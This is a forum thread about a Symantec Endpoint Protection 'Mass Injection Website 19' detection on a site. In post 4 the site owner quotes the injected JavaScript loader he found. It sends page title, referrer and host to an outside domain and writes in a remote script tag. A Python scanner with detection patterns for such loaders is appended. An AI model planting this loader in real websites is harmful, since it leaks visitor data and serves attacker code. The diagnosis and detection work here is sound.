Endpoint Protection

  • 1.  Web Attack: Mass Injection Website 19

    Posted Jan 26, 2016 03:15 AM

    Hello,

    I have a problem with the web site www.vyrava.sk.

    log from SEP:

    22.1.2016 12:23:26    Intrusion Prevention    Critical    Incoming    TCP    37.9.175.19    80    N/A    192.168.102.101    52317    N/A    \DEVICE\HARDDISKVOLUME4\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE    28821    70105    Web Attack: Mass Injection Website 19    www.vyrava.sk/        22.1.2016 12:23:02    22.1.2016 12:23:11    [SID: 28821] Web Attack: Mass Injection Website 19 attack blocked. Traffic has been blocked for this application: \DEVICE\HARDDISKVOLUME4\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE

    https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821

    I think this web site www.vyrava.sk is OK.

    I would like to make an exception for this, for example:

    28821.png

    but there is ONLY severity "High" and I need severity "Critical".

    We checked our site and made sure there is no virus on our server and site, and would like to request delisting from Symantec Endpoint Protection. I went to http://ipremoval.sms.symantec.com/lookup/ and https://sitecheck.sucuri.net, and we found out that our server IP was not listed.

    Why was my site reported as a Web Attack? What should I do next?

    Thank you very much for your advice.



  • 2.  RE: Web Attack: Mass Injection Website 19

    Posted Jan 26, 2016 06:50 AM

    This is your site, correct? Have you verified no malicious code was injected in it? See both of these threads with the same example:

    https://www-secure.symantec.com/connect/forums/mass-injection-website-19

    https://www-secure.symantec.com/connect/forums/mass-injection-website-19-0

    Symantec also has a blog on it:

    http://www.symantec.com/connect/blogs/global-mass-injection-affects-thousands-websites-worldwide



  • 3.  RE: Web Attack: Mass Injection Website 19
    Best Answer

    Posted Jan 26, 2016 08:06 AM

    Hi luben,

    Thanks for the post. This has become a common query and no, it is probably not a False Positive. See the links that Brian supplied above. Here's another good link:

    Web Attack: Mass Injection Website 19 — Solved!


  • 4.  RE: Web Attack: Mass Injection Website 19

    Posted Jan 27, 2016 03:33 AM

    Thank you for your response.

    I found this script on the web site.

    "<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://integracyjne-imprezy.eu/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>"



  • 5.  RE: Web Attack: Mass Injection Website 19

    Posted Jan 27, 2016 07:39 AM

    Clean that up and make sure you lock down your website so not everyone is able to perform malicious actions.
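
Added example (not part of the original thread and not Symantec code): a small Python scanner for locating loaders like the one quoted in post 4 across a web root before cleaning up. The trait list, function names and file extensions are assumptions of this example, and the sample page is constructed, modelled on that script.

```python
import os
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""", re.I)
# Traits of the loader quoted in the thread; heuristics chosen for this example.
TRAITS = {
    "writes a script tag": re.compile(r"document\.write\s*\(\s*['\"]<script", re.I),
    "reads document.referrer": re.compile(r"document\.referrer"),
    "splits the closing tag": re.compile(r"['\"]<['\"]\s*\+\s*['\"]/script>", re.I),
}

def same_site(host, site_host):
    site = re.sub(r"^www\.", "", site_host.lower())  # treat www.example and example alike
    return host.lower() == site or host.lower().endswith("." + site)

def inspect_html(html, site_host):
    """One finding per inline script that writes a script tag and names a foreign host."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)}
        foreign = sorted(h for h in hosts if h and not same_site(h, site_host))
        traits = [name for name, rx in TRAITS.items() if rx.search(body)]
        if foreign and "writes a script tag" in traits:
            findings.append({"offset": m.start(), "hosts": foreign, "traits": traits})
    return findings

def scan_tree(root, site_host, exts=(".html", ".htm", ".php", ".tpl")):
    """Walk a web root and map each affected file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = inspect_html(fh.read(), site_host)
                if found:
                    report[path] = found
    return report

# Constructed page: a benign inline script, then a loader modelled on post 4.
SAMPLE = (
    '<html><script>var ok = "http://www.vyrava.sk/js/menu.js";</script>'
    '<script>var se_referrer = encodeURIComponent(document.referrer);'
    ' var base = "http://integracyjne-imprezy.eu/js/jquery.min.php";'
    " document.write('<script src=\"' + base + '?se_referrer=' + se_referrer + '\">' + '<' + '/script>');"
    '</script></html>'
)
```

Findings are candidates for manual review, since legitimate third-party snippets can share some of these traits; a file that keeps reappearing in the report after cleanup means the write access used for the injection is still open.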